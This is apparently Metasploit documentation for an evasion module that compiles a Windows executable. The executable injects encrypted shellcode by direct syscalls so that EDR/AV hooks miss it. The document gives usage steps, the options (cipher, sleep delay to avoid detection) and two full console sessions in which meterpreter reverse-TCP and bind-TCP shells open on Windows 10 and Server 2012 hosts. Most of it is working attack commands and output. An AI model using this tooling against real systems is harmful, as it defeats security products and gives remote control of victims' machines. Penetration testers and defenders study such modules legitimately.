documentation/modules/evasion/windows/syscall_inject.md
This module creates a Windows executable that injects a given payload/shellcode into memory while bypassing the Windows API hooks that EDR/AV products place in user mode: instead of calling the hooked APIs it issues direct syscalls, implemented with Mingw inline assembly. Mingw (x86_64) must be installed on the system and present in the PATH environment variable.

The technique is based on "Sorting by System Call Address": all Zw* stubs exported in the EAT of NTDLL.dll are enumerated and sorted by address, which recovers the correct syscall numbers even when the indices inside the stubs have been overwritten by an AV. For more details
Steps using a meterpreter/reverse_tcp payload on a 64-bit target:

1. `use evasion/windows/syscall_inject`
2. `set LHOST <local IP>`
3. `set payload windows/x64/meterpreter/reverse_tcp`
4. `handler -p windows/x64/meterpreter/reverse_tcp -H <local IP> -P <local port>`
5. `run`

Module options:

- `CIPHER`: encryption algorithm used to encrypt the payload. Available ones: CHACHA, RC4.
- Filename for the generated evasive file. The default is random.
- Whether to add random data such as names, emails and GUIDs to the final executable.
- `SLEEP`: how long the program sleeps, in milliseconds, before executing the shellcode's thread (NtCreateThread). NOTE: the longer the sleep, the better the chance of avoiding detection.
- Optimization level passed to the compiler (Mingw).
Example run with a `windows/x64/meterpreter/reverse_tcp` payload against a Windows 10 x64 target:

```
msf > use evasion/windows/syscall_inject
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf evasion(windows/syscall_inject) > set SLEEP 10000
SLEEP => 10000
msf evasion(windows/syscall_inject) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf evasion(windows/syscall_inject) > run
[+] pYlCSOAeW.exe stored at /Users/user/.msf4/local/pYlCSOAeW.exe
msf evasion(windows/syscall_inject) > cp /Users/user/.msf4/local/pYlCSOAeW.exe ~
[*] exec: cp /Users/user/.msf4/local/pYlCSOAeW.exe ~
msf evasion(windows/syscall_inject) > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.104 -P 4444
[*] Payload handler running as background job 1.
[*] Started reverse TCP handler on 192.168.1.104:4444
msf evasion(windows/syscall_inject) > [*] Sending stage (200262 bytes) to 192.168.1.103
[*] Meterpreter session 3 opened (192.168.1.104:4444 -> 192.168.1.103:53007) at 2021-08-01 17:08:43 +0300
msf evasion(windows/syscall_inject) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer : DESKTOP-822593D
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.103 - Meterpreter session 3 closed. Reason: User exit
```
Example run with a `windows/x64/meterpreter_bind_tcp` payload and the RC4 cipher against a Windows Server 2012 x64 target:

```
msf > use evasion/windows/syscall_inject
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf evasion(windows/syscall_inject) > set payload windows/x64/meterpreter_bind_tcp
payload => windows/x64/meterpreter_bind_tcp
msf evasion(windows/syscall_inject) > set RHOST 192.168.225.76
RHOST => 192.168.225.76
msf evasion(windows/syscall_inject) > set LPORT 10156
LPORT => 10156
msf evasion(windows/syscall_inject) > set cipher rc4
cipher => rc4
msf evasion(windows/syscall_inject) > run
[+] ShP.exe stored at /Users/medicus/.msf4/local/ShP.exe
msf evasion(windows/syscall_inject) > cp /Users/medicus/.msf4/local/ShP.exe ~
[*] exec: cp /Users/medicus/.msf4/local/ShP.exe ~
msf evasion(windows/syscall_inject) > handler -p windows/x64/meterpreter_bind_tcp -H 192.168.225.76 -P 10156
[*] Payload handler running as background job 0.
[*] Started bind TCP handler against 192.168.225.76:10156
msf evasion(windows/syscall_inject) > [*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.225.76:10156) at 2021-08-01 17:32:05 +0300
msf evasion(windows/syscall_inject) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : LABCE28
OS : Windows 2012 (6.2 Build 9200).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 386
Meterpreter : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.225.76 - Meterpreter session 1 closed. Reason: User exit
```